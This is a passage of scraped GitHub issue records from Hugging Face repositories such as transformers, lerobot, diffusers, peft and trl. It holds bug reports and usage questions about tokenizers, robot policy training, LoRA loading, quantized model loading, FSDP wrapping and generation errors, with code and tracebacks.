] My own task or dataset (give details below)\n\n### Reproduction\n\n```\nsample_text='A girl is styling her hair.'\nbert_tokenizer = BertTokenizerFast.from_pretrained('google-bert/bert-base-cased')\nbert_encoding = bert_tokenizer(\n text=sample_text, add_special_tokens=False, return_offsets_mapping=True\n)\nprint(bert_encoding['offset_mapping'])\nqwen_tokenizer = AutoTokenizer.from_pretrained('Qwen/Qwen3-Embedding-0.6B')\nqwen_encoding = qwen_tokenizer(\n text=sample_text, add_special_tokens=False, return_offsets_mapping=True\n)\nprint(qwen_encoding['offset_mapping'])\n```\n\n### Expected behavior\n\n[(0, 1), (2, 6), (7, 9), (10, 17), (18, 21), (22, 26), (26, 27)]\n[(0, 1), (1, 6), (6, 9), (9, 17), (17, 21), (21, 26), (26, 27)]", "url": "https://github.com/huggingface/transformers/issues/39401", "state": "closed", "labels": [ "bug" ], "created_at": "2025-07-14T14:21:08Z", "updated_at": "2025-07-16T09:59:35Z", "comments": 4, "user": "contribcode" }, { "repo": "huggingface/lerobot", "number": 1506, "title": "episode: None", "body": "When I run \"python -m lerobot.scripts.train --dataset.root=./lerobot_datasets/my_robot_dataset/ --output_dir=./lerobot_datasets/outputs/ --policy.type=pi0 --dataset.repo_id=lerobot/tape --policy.push_to_hub=false\", I got\n\u2018\u2019\n'dataset': {'episodes': None,\n 'image_transforms': {'enable': False...\n}\n\u2018\u2019. \nIs this right?", "url": "https://github.com/huggingface/lerobot/issues/1506", "state": "open", "labels": [ "question", "policies" ], "created_at": "2025-07-14T13:29:07Z", "updated_at": "2025-08-12T09:31:16Z", "user": "LogSSim" }, { "repo": "huggingface/finetrainers", "number": 420, "title": "How to fine-tune Wan 2.1 with Context Parallelism?", "body": "I am trying to fine-tune the Wan 2.1 model and would like to leverage the Context Parallelism (CP) feature to manage memory and scale the training. I saw in the main README that `CP support` is listed as a key feature.\n\nI have looked through the `examples/training` directory and the documentation, but I couldn't find a specific example or launch script demonstrating how to fine-tune the Wan model with Context Parallelism enabled.\n\nCould you please provide some guidance or a minimal example on how to properly configure a training job for **Wan 2.1 with Context Parallelism**?", "url": "https://github.com/huggingface/finetrainers/issues/420", "state": "open", "labels": [], "created_at": "2025-07-14T06:55:39Z", "updated_at": "2025-07-15T05:09:45Z", "user": "vviper25" }, { "repo": "huggingface/lerobot", "number": 1503, "title": "LeRobot So100 and Groot N1.5 Model Multi-Robot Deployment Feasibility Inquiry", "body": "Hello, I am conducting various tests using LeRobot's So100 (robot arm) with Groot N1.5 for training.\nI have some questions to ask.\n\n**Main Question**\nIs it possible to simultaneously apply a model trained with Groot N1.5 base on one robot to multiple robots of the same model?\n\n**Question Background (Actual Experience)**\nI had a model that was trained with Groot 1.5 base using data collected from So100. However, when one robot motor failed and was replaced, I had to recalibrate the entire system.\nAfter applying the previously used model for inference, the robot did not operate properly.\nI suspect this might be due to the basic position changing during the calibration process.\n\n**Core Question**\nFollowing this logic, does each robot of the same model require an individual model tailored to its specific calibration?\n\nThis question also relates to whether a single unified model can be used for inference and operation when deploying 100 robot arms in a factory setting.\n\nI would appreciate your response.", "url": "https://github.com/huggingface/lerobot/issues/1503", "state": "open", "labels": [ "enhancement", "question", "policies", "dataset" ], "created_at": "2025-07-14T05:55:44Z", "updated_at": "2025-08-12T09:31:35Z", "user": "devedgar" }, { "repo": "huggingface/lerobot", "number": 1497, "title": "ValueError: 'policy.repo_id' argument missing. Please specify it to push the model to the hub.", "body": "### System Info\n\n```Shell\nlerobot commit version:\nhttps://github.com/huggingface/lerobot/tree/69901b9b6a2300914ca3de0ea14b6fa6e0203bd4\n```\n\n### Information\n\n- [ ] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n(lerobot) robot@robot-Legion-Y9000P-IRX8:~/imitation_learning_lerobot/lerobot$ python lerobot/scripts/train.py \\\n> --policy.type=act \\\n> --dataset.repo_id=lerobot/aloha_sim_transfer_cube_human \\\n> --env.type=aloha \\\n> --env.task=AlohaTransferCube-v0 \\\n> --output_dir=outputs/train/act_aloha_transfer\nINFO 2025-07-13 12:30:41 ils/utils.py:48 Cuda backend detected, using cuda.\nWARNING 2025-07-13 12:30:41 /policies.py:77 Device 'None' is not available. Switching to 'cuda'.\nTraceback (most recent call last):\n File \"/home/robot/imitation_learning_lerobot/lerobot/lerobot/scripts/train.py\", line 291, in \n train()\n File \"/home/robot/imitation_learning_lerobot/lerobot/lerobot/configs/parser.py\", line 226, in wrapper_inner\n response = fn(cfg, *args, **kwargs)\n File \"/home/robot/imitation_learning_lerobot/lerobot/lerobot/scripts/train.py\", line 110, in train\n cfg.validate()\n File \"/home/robot/imitation_learning_lerobot/lerobot/lerobot/configs/train.py\", line 120, in validate\n raise ValueError(\nValueError: 'policy.repo_id' argument missing. Please specify it to push the model to the hub.\n\n\n### Expected behavior\n\nexpected it can work", "url": "https://github.com/huggingface/lerobot/issues/1497", "state": "open", "labels": [ "question", "policies", "configuration" ], "created_at": "2025-07-13T04:33:14Z", "updated_at": "2025-08-12T09:32:36Z", "user": "dbdxnuliba" }, { "repo": "huggingface/trl", "number": 3730, "title": "How to design stable reward functions for open-ended text generation tasks in GRPO?", "body": "I'm using GRPO for a text generation task where there's no single correct answer. I currently compute the reward using cosine similarity between the model output and a reference response. However, during training (around 400 steps), the reward values are quite unstable and fluctuate significantly.\n\nI'm wondering:\n\nIs cosine similarity a reasonable choice for reward in open-ended tasks?\n\nAre there better practices to stabilize the reward or design it more effectively in such scenarios?\n\nShould I consider switching to a learnable reward model (e.g., contrastive learning)?\n\nAny general advice on reward design in non-deterministic generation tasks would be greatly appreciated. Thanks!", "url": "https://github.com/huggingface/trl/issues/3730", "state": "open", "labels": [ "\u2753 question", "\ud83c\udfcb Reward", "\ud83c\udfcb GRPO" ], "created_at": "2025-07-12T18:39:37Z", "updated_at": "2025-07-12T18:40:05Z", "user": "Jax922" }, { "repo": "huggingface/diffusers", "number": 11915, "title": "Create modular pipeline from existing pipeline", "body": "new concept of modular pipelines added via #9672 is very flexible way of creating custom pipelines \nand one of the best early use-cases is new concept of modular guiders added via #11311 \n\nhowever, this would require a complete rewrite of the existing user apps/codebases to use new concepts \nand would likely significantly slow down adoption (if not even block adoption for a long time) \n\nask here is to provide a way to use an existing pipeline to instantiate a modular pipeline, \nvery similar to how different standard diffuser pipelines can be instantiated \nfrom a single pipeline class using `from_pipe` method \n\nexample of desired workflow:\n\n```py\nimport torch\nimport diffusers\n\n# load pipeline using any normal method \n# such as DiffusionPipeline, AutoPipelineForText2Image, StableDiffusionPipeline, etc. \npipe = diffusers.DiffusionPipeline.from_pretrained(\n \"stabilityai/stable-diffusion-xl-base-1.0\",\n torch_dtype=torch.bfloat16,\n)\n\n# create modular pipeline from loaded pipeline\nmodular = diffusers.ModularPipeline.from_pipe(pipe)\n\n# create guider and activate it\ncfg = diffusers.ClassifierFreeGuidance(guidance_scale=5.0, guidance_rescale=0.0, start=0.0, stop=1.0)\nmodular.update_states(guider=cfg)\n\noutput = modular(\n prompt='astronaut in a diner',\n height=1024, width=1024)\n```\n\ncc: @yiyixuxu @a-r-r-o-w @sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/11915", "state": "closed", "labels": [], "created_at": "2025-07-12T16:08:30Z", "updated_at": "2025-08-28T08:18:08Z", "comments": 6, "user": "vladmandic" }, { "repo": "huggingface/diffusers", "number": 11914, "title": "Loading multiple LoRAs to 1 pipeline in parallel, 1 LoRA to 2-pipelines on 2-GPUs", "body": "Hi everyone,\n\nI have the following scenario. \n\nI have a machine with 2-GPUs and a running service that keep has two pipelines loaded to their corresponding devices. Also I have a list of LoRAs (say 10). On each request I split the batch into 2 parts (request also has the corresponding information about LoRA), load LoRAs and run the forward pass.\n\nThe problem I encounter is that whatever parallelization method I have tried (threading, multi-processing), the maximum I have achieved is pre-loading LoRAs on the cpu and then, moving them to GPU and only after that `load_lora_weights` from the state_dict. \n\nEven if I attempt to achieve parallelization in by calling the chunk where I load in parallel in threads, the pipe starts to produce either a complete noise or a black image.\n\nWhere I would appreciate a lot the help is:\n\n1. To get an advice of elegantly loading multiple LoRAs at once into one pipe (all examples in the documentation indicate that one needs to do it 1 by 1)\n2. If I have 2 pipes on 2 different devices, how to parallelize the process of loading 1 LoRA to pipes on their corresponding devices.\n\n```\ndef apply_multiple_loras_from_cache(pipes, adapter_names, lora_cache, lora_names, lora_strengths, devices):\n for device_index, pipe in enumerate(pipes):\n logger.info(f\"Starting setup for device {devices[device_index]}\")\n \n # Step 1: Unload LoRAs\n start = time.time()\n pipe.unload_lora_weights(reset_to_overwritten_params=False)\n logger.info(f\"[Device {device_index}] Unload time: {time.time() - start:.3f}s\")\n\n # Step 2: Parallelize CPU \u2192 GPU state_dict move\n def move_to_device(name):\n return name, {\n k: v.to(devices[device_index], non_blocking=True).to(pipe.dtype)\n for k, v in lora_cache[name]['state_dict'].items()\n }\n\n start = time.time()\n with ThreadPoolExecutor() as executor:\n future_to_name = {executor.submit(move_to_device, name): name for name in adapter_names}\n results = [future.result() for future in as_completed(future_to_name)]\n logger.info(f\"[Device {device_index}] State dict move + dtype conversion time: {time.time() - start:.3f}s\")\n\n # Step 3: Load adapters\n start = time.time()\n \n \n for adapter_name, state_dict in results:\n\n pipe.load_lora_weights(\n pretrained_model_name_or_path_or_dict=state_dict,\n adapter_name=adapter_name\n )\n logger.info(f\"[Device {device_index}] Load adapter weights time: {time.time() - start:.3f}s\")\n\n # Step 4: Set adapter weights\n start = time.time()\n pipe.set_adapters(lora_names, adapter_weights=lora_strengths)\n logger.info(f\"[Device {device_index}] Set adapter weights time: {time.time() - start:.3f}s\")\n\n torch.cuda.empty_cache()\n logger.info(\"All LoRAs applied and GPU cache cleared.\")\n```", "url": "https://github.com/huggingface/diffusers/issues/11914", "state": "closed", "labels": [], "created_at": "2025-07-12T15:54:44Z", "updated_at": "2025-07-15T19:40:11Z", "comments": 5, "user": "vahe-toffee" }, { "repo": "huggingface/lerobot", "number": 1494, "title": "release the code for reproducing the performance on the LIBERO dataset reported in the SmolVLA paper?", "body": "Has anyone been able to reproduce the performance on the LIBERO dataset reported in the SmolVLA paper? I\u2019d appreciate any guidelines or tips to help with reproducing the results.", "url": "https://github.com/huggingface/lerobot/issues/1494", "state": "closed", "labels": [ "question", "policies", "simulation" ], "created_at": "2025-07-12T09:35:00Z", "updated_at": "2025-09-23T09:44:59Z", "user": "JustinKai0527" }, { "repo": "huggingface/datasets", "number": 7680, "title": "Question about iterable dataset and streaming", "body": "In the doc, I found the following example: https://github.com/huggingface/datasets/blob/611f5a592359ebac6f858f515c776aa7d99838b2/docs/source/stream.mdx?plain=1#L65-L78\n\nI am confused, \n1. If we have already loaded the dataset, why doing `to_iterable_dataset`? Does it go through the dataset faster than map-style dataset?\n2. `load_dataset(streaming=True)` is useful for huge dataset, but the speed is slow. How to make it comparable to `to_iterable_dataset` without loading the whole dataset into RAM?", "url": "https://github.com/huggingface/datasets/issues/7680", "state": "open", "labels": [], "created_at": "2025-07-12T04:48:30Z", "updated_at": "2025-08-01T13:01:48Z", "comments": 8, "user": "Tavish9" }, { "repo": "huggingface/transformers", "number": 39377, "title": "FlashAttention2 support for GSAI-ML / LLaDA-8B-Instruct?", "body": "Hi there,\n\nI attempted to use flash attention 2 with this model but it seems like it isn't supported, based on this error:\n```\nValueError: LLaDAModelLM does not support Flash Attention 2.0 yet. Please request to add support where the model is hosted, on its model hub page: https://huggingface.co/GSAI-ML/LLaDA-8B-Instruct/discussions/new or in the Transformers GitHub repo: https://github.com/huggingface/transformers/issues/new\n```\n\nwould it be possible to add support to this kind of model? \n\nThank you for your time!", "url": "https://github.com/huggingface/transformers/issues/39377", "state": "closed", "labels": [], "created_at": "2025-07-12T02:48:36Z", "updated_at": "2025-08-19T08:03:26Z", "comments": 2, "user": "lbertge" }, { "repo": "huggingface/lerobot", "number": 1492, "title": "Is there any plan to add a validation loss in the training pipeline, which is not dependent on simulation env.", "body": "Can we have a dataset split in the training code to run the model on a holdout validation episode to check loss on it?", "url": "https://github.com/huggingface/lerobot/issues/1492", "state": "open", "labels": [ "enhancement", "question", "policies" ], "created_at": "2025-07-11T20:43:04Z", "updated_at": "2025-12-30T07:12:20Z", "user": "mohitydv09" }, { "repo": "huggingface/peft", "number": 2642, "title": "Prompt_Tuning.ipynb example doesn't seem to train the model", "body": "Hello! I am running Prompt-Tuning notebook example from PEFT lib examples [here](https://github.com/huggingface/peft/blob/main/examples/sequence_classification/Prompt_Tuning.ipynb). I did **not** change any line of code and I ran the code block sequentially.\n\nHowever, the performance under metrics remain exactly the **same** for each epoch, which is very weird. From the [orignal notebook](https://github.com/huggingface/peft/blob/main/examples/sequence_classification/Prompt_Tuning.ipynb), we can see accuracy fluctuates and can increase to 0.70. \n\nI checked the output logits for the training data is changing every epoch (set shuffle=False, and this is the only change for debugging). Now I am very confused, any suggestions would be very much welcome, please let me know if I am doing something very wrong, thanks in advance!\n\n\nHere's the performance log:\n```\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.36it/s]\nepoch 0: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.72it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.49it/s]\nepoch 1: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.34it/s]\nepoch 2: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.72it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.35it/s]\nepoch 3: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.47it/s]\nepoch 4: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.69it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.63it/s]\nepoch 5: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.75it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.45it/s]\nepoch 6: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.40it/s]\nepoch 7: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.53it/s]\nepoch 8: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:19<00:00, 5.76it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.27it/s]\nepoch 9: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.75it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.50it/s]\nepoch 10: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.63it/s]\nepoch 11: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:19<00:00, 5.77it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.50it/s]\nepoch 12: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:19<00:00, 5.78it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.60it/s]\nepoch 13: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 115/115 [00:20<00:00, 5.74it/s]\n100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588| 13/13 [00:01<00:00, 10.54it/s]\nepoch 14: {'accuracy': 0.6838235294117647, 'f1': 0.8122270742358079}\n```\n\nBesides, my environment info is here if it helps debugging:\n```\npython 3.10\ntransformers 4.52.4\npeft 0.16.0\ntorch 2.7.0\njupyterlab 4.4.3\nOS Ubuntu 22.04 LTS\nGPU NVIDIA RTX 5880\n```", "url": "https://github.com/huggingface/peft/issues/2642", "state": "closed", "labels": [], "created_at": "2025-07-11T18:26:58Z", "updated_at": "2025-08-23T15:03:47Z", "comments": 8, "user": "ruixing76" }, { "repo": "huggingface/transformers", "number": 39366, "title": "RuntimeError when loading llmcompressor W8A8 quantized model: int8 dtype in weight initialization", "body": "I'm trying to load the quantized model `RedHatAI/Qwen2.5-VL-7B-Instruct-quantized.w8a8` but encountering a dtype compatibility issue during model initialization. The model appears to be quantized using `llmcompressor` with W8A8 quantization scheme.\n\n**Note**: I need to load this model without vLLM because I may need to add custom hooks for my research, so I'm looking for a direct loading method using transformers/llmcompressor.\n\n## Error Message\n\n```python\nRuntimeError: expected a floating-point or complex dtype, but got dtype=torch.int8\n```\n\n**Full Stack Trace:**\n```python\nFile \"/transformers/models/qwen2_5_vl/modeling_qwen2_5_vl.py\", line 366, in _init_weights\n module.weight.data.normal_(mean=0.0, std=std)\nFile \"/torch/_refs/__init__.py\", line 6214, in normal_\n return normal(mean, std, self.shape, out=self, generator=generator)\n...\nRuntimeError: expected a floating-point or complex dtype, but got dtype=torch.int8\n```\n\n## Traceback\n\nThe error occurs during model weight initialization where transformers tries to call `normal_()` on int8 tensors. The `normal_()` function in PyTorch only works with floating-point tensors, but the quantized model contains int8 weights.\n\n**Specific failure point:**\n- File: `modeling_qwen2_5_vl.py`, line 366\n- Function: `_init_weights()` \n- Operation: `module.weight.data.normal_(mean=0.0, std=std)`\n- Issue: Trying to apply normal distribution to int8 tensors\n\n## Model Information\n\nBased on the model's `config.json`:\n- **Quantization method**: `compressed-tensors`\n- **Format**: `int-quantized` \n- **Scheme**: W8A8 (8-bit weights and activations)\n- **Base model**: `Qwen/Qwen2.5-VL-7B-Instruct`\n- **Compression ratio**: ~1.2x\n- **Ignored layers**: All visual layers (`visual.blocks.*`, `visual.merger.*`, `lm_head`)\n\n## What I've Tried\n\n### 1. llmcompressor methods:\n```python\n# Method 1: TraceableQwen2_5_VLForConditionalGeneration\nfrom llmcompressor.transformers.tracing import TraceableQwen2_5_VLForConditionalGeneration\nmodel = TraceableQwen2_5_VLForConditionalGeneration.from_pretrained(\n model_path, device_map=\"auto\", torch_dtype=\"auto\", trust_remote_code=True\n)\n\n# Method 2: SparseAutoModelForCausalLM \nfrom llmcompressor.transformers import SparseAutoModelForCausalLM\nmodel = SparseAutoModelForCausalLM.from_pretrained(\n model_path, device_map=\"auto\", torch_dtype=\"auto\", trust_remote_code=True\n)\n```\n\n### 2. Standard transformers methods:\n```python\n# Method 3: Various dtype configurations\nmodel = Qwen2_5_VLForConditionalGeneration.from_pretrained(\n model_path,\n torch_dtype=torch.bfloat16, # Also tried: torch.float16, \"auto\", None\n trust_remote_code=True,\n device_map=\"auto\"\n)\n\n# Method 4: AutoModelForCausalLM\nmodel = AutoModelForCausalLM.from_pretrained(\n model_path, trust_remote_code=True, torch_dtype=\"auto\"\n)\n```\n\n**All methods fail at the same weight initialization step, so I wonder should the model be loaded with `_fast_init=False` or other special parameters?**\n\n## Additional Observations\n\n1. **Warning about ignored layers**: The loader warns about missing visual layers, but this seems expected since they were ignored during quantization\n2. **Model files exist**: The quantized model directory contains the expected `.safetensors` files and configuration\n3. **Original model works**: The base `Qwen/Qwen2.5-VL-7B-Instruct` loads and works perfectly\n\n## Environment\n\n- **Python**: 3.10\n- **PyTorch**: 2.7.0+cu126\n- **Transformers**: 4.52.4\n- **LLMCompressor**: 0.6.0\n- **Compressed-tensors**: 0.10.2\n\n\nThis model was likely created using llmcompressor's oneshot quantization:\n```python\nfrom llmcompressor.modifiers.quantization import GPTQModifier\nfrom llmcompressor.transformers import oneshot\n\nrecipe = [\n GPTQModifier(\n targets=\"Linear\",\n scheme=\"W8A8\", \n sequential_targets=[\"Qwen2_5_VLDecoderLayer\"],\n ignore=[\"lm_head\", \"re:visual.*\"],\n ),\n]\n```\nIf this is more of an llmcompressor-specific model loading issue rather than a transformers compatibility issue, please let me know and I'll file this issue in the llmcompressor repository instead.\n\n", "url": "https://github.com/huggingface/transformers/issues/39366", "state": "closed", "labels": [ "Good First Issue" ], "created_at": "2025-07-11T15:15:09Z", "updated_at": "2025-12-08T13:30:10Z", "comments": 10, "user": "AdelineXinyi" }, { "repo": "huggingface/lerobot", "number": 1483, "title": "How can I set `max_relative_target` to get safe action?", "body": "I saw this in function `send_action` in `src/lerobot/robots/so100_follower/so100_follower.py` \n```python\n\n def send_action(self, action: dict[str, Any]) -> dict[str, Any]:\n \"\"\"Command arm to move to a target joint configuration.\n\n The relative action magnitude may be clipped depending on the configuration parameter\n `max_relative_target`. In this case, the action sent differs from original action.\n Thus, this function always returns the action actually sent.\n\n Raises:\n RobotDeviceNotConnectedError: if robot is not connected.\n\n Returns:\n the action sent to the motors, potentially clipped.\n \"\"\"\n if not self.is_connected:\n raise DeviceNotConnectedError(f\"{self} is not connected.\")\n\n goal_pos = {key.removesuffix(\".pos\"): val for key, val in action.items() if key.endswith(\".pos\")}\n\n # Cap goal position when too far away from present position.\n # /!\\ Slower fps expected due to reading from the follower.\n if self.config.max_relative_target is not None:\n present_pos = self.bus.sync_read(\"Present_Position\")\n goal_present_pos = {key: (g_pos, present_pos[key]) for key, g_pos in goal_pos.items()}\n goal_pos = ensure_safe_goal_position(goal_present_pos, self.config.max_relative_target)\n\n # Send goal position to the arm\n self.bus.sync_write(\"Goal_Position\", goal_pos)\n return {f\"{motor}.pos\": val for motor, val in goal_pos.items()}\n```\nBut in So100followerconfig it defaults to None\n```python\nclass SO100FollowerConfig(RobotConfig):\n # Port to connect to the arm\n port: str\n\n disable_torque_on_disconnect: bool = True\n\n # `max_relative_target` limits the magnitude of the relative positional target vector for safety purposes.\n # Set this to a positive scalar to have the same value for all motors, or a list that is the same length as\n # the number of motors in your follower arms.\n max_relative_target: int | None = None\n\n # cameras\n cameras: dict[str, CameraConfig] = field(default_factory=dict)\n\n # sensors\n sensors: dict[str, ForceSensorConfig] = field(default_factory=dict)\n\n # Set to `True` for backward compatibility with previous policies/dataset\n use_degrees: bool = False\n```\nI don't know how much should I set `max_relative_target` is there any instruction? thanks!!", "url": "https://github.com/huggingface/lerobot/issues/1483", "state": "open", "labels": [ "question", "robots" ], "created_at": "2025-07-11T02:46:02Z", "updated_at": "2025-08-12T09:34:51Z", "user": "milong26" }, { "repo": "huggingface/peft", "number": 2640, "title": "Why peft.utils.other.fsdp_auto_wrap_policy do not warp the module do not require grad?", "body": "In https://github.com/huggingface/peft/blob/main/src/peft/utils/other.py#L977, \n\n```\ndef fsdp_auto_wrap_policy(model):\n if hasattr(FullyShardedDataParallelPlugin, \"get_module_class_from_name\"):\n get_module_class_from_name = FullyShardedDataParallelPlugin.get_module_class_from_name\n else:\n from accelerate.utils.dataclasses import get_module_class_from_name\n from torch.distributed.fsdp.wrap import _or_policy, lambda_auto_wrap_policy, transformer_auto_wrap_policy\n\n from ..tuners import PrefixEncoder, PromptEmbedding, PromptEncoder\n\n default_transformer_cls_names_to_wrap = \",\".join(_get_no_split_modules(model))\n transformer_cls_names_to_wrap = os.environ.get(\n \"FSDP_TRANSFORMER_CLS_TO_WRAP\", default_transformer_cls_names_to_wrap\n ).split(\",\")\n transformer_cls_to_wrap = {PrefixEncoder, PromptEncoder, PromptEmbedding}\n for layer_class in transformer_cls_names_to_wrap:\n if len(layer_class) == 0:\n continue\n transformer_cls = get_module_class_from_name(model, layer_class)\n if transformer_cls is None:\n raise Exception(\"Could not find the transformer layer class to wrap in the model.\")\n else:\n transformer_cls_to_wrap.add(transformer_cls)\n\n def lambda_policy_fn(module):\n if (\n len(list(module.named_children())) == 0\n and getattr(module, \"weight\", None) is not None\n and module.weight.requires_grad\n ):\n return True\n return False\n\n lambda_policy = functools.partial(lambda_auto_wrap_policy, lambda_fn=lambda_policy_fn)\n transformer_wrap_policy = functools.partial(\n transformer_auto_wrap_policy,\n transformer_layer_cls=transformer_cls_to_wrap,\n )\n\n auto_wrap_policy = functools.partial(_or_policy, policies=[lambda_policy, transformer_wrap_policy])\n return auto_wrap_policy\n```\n\nthe fsdp_auto_wrap_policy uses a lambda_policy_fn which does not warp the module does not require grad. \nBut in regular Lora training, the original network does not need grad. \nThat may cause every GPU still keep a full network copy even in FSDP FULLY SHARD. \nWhy the code design such a policy?", "url": "https://github.com/huggingface/peft/issues/2640", "state": "closed", "labels": [], "created_at": "2025-07-10T12:07:13Z", "updated_at": "2025-08-18T15:05:03Z", "comments": 4, "user": "Changlin-Lee" }, { "repo": "huggingface/transformers", "number": 39336, "title": "TypeError: GenerationMixin._extract_past_from_model_output() got an unexpected keyword argument 'standardize_cache_format'", "body": "I am using CogVLM2 video captioning model\n\nIt works latest with transformers==4.43.4\n\nwith transformers==4.44.0 and forward I get below error\n\nbut I need to use latest version of transformers since currently 4bit quantization fails on some gpus and platforms\n\nhow can i fix this issue?\n\n`TypeError: GenerationMixin._extract_past_from_model_output() got an unexpected keyword argument 'standardize_cache_format'`\n\n```\n14:23:32 - INFO - Final video tensor shape for CogVLM processing: torch.Size([3, 24, 720, 1280])\n14:23:35 - ERROR - Error during auto-captioning: GenerationMixin._extract_past_from_model_output() got an unexpected keyword argument 'standardize_cache_format'\nTraceback (most recent call last):\n File \"E:\\Ultimate_Video_Processing_v1\\STAR\\logic\\cogvlm_utils.py\", line 679, in auto_caption\n outputs_tensor = local_model_ref.generate(**inputs_on_device, **gen_kwargs)\n File \"E:\\Ultimate_Video_Processing_v1\\venv\\lib\\site-packages\\torch\\utils\\_contextlib.py\", line 116, in decorate_context\n return func(*args, **kwargs)\n File \"E:\\Ultimate_Video_Processing_v1\\venv\\lib\\site-packages\\transformers\\generation\\utils.py\", line 2024, in generate\n result = self._sample(\n File \"E:\\Ultimate_Video_Processing_v1\\venv\\lib\\site-packages\\transformers\\generation\\utils.py\", line 3032, in _sample\n model_kwargs = self._update_model_kwargs_for_generation(\n File \"E:\\Ultimate_Video_Processing_v1\\STAR\\models\\modules\\transformers_modules\\cogvlm2-video-llama3-chat\\modeling_cogvlm.py\", line 726, in _update_model_kwargs_for_generation\n cache_name, cache = self._extract_past_from_model_output(\nTypeError: GenerationMixin._extract_past_from_model_output() got an unexpected keyword argument 'standardize_cache_format'\n```\n\n@amyeroberts, @qubvel @SunMarc @MekkCyber \n\nthe error i am getting is below with 4.43.1 on B200 when doing 4bit quant. interesting same code same libraries on my rtx 5090 on windows working without errors\n\nfp16 has no issues\n\n\n```\n11:45:10 - INFO - Preparing to load model from: /workspace/STAR/models/cogvlm2-video-llama3-chat with quant: 4, dtype: torch.bfloat16, device: cuda, device_map: auto, low_cpu_mem: True\n11:45:10 - INFO - Starting model loading - this operation cannot be interrupted once started\n/workspace/venv/lib/python3.10/site-packages/torchvision/transforms/_functional_video.py:6: UserWarning: The 'torchvision.transforms._functional_video' module is deprecated since 0.12 and will be removed in the future. Please use the 'torchvision.transforms.functional' module instead.\n warnings.warn(\n/workspace/venv/lib/python3.10/site-packages/torchvision/transforms/_transforms_video.py:22: UserWarning: The 'torchvision.transforms._transforms_video' module is deprecated since 0.12 and will be removed in the future. Please use the 'torchvision.transforms' module instead.\n warnings.warn(\nLoading checkpoint shards: 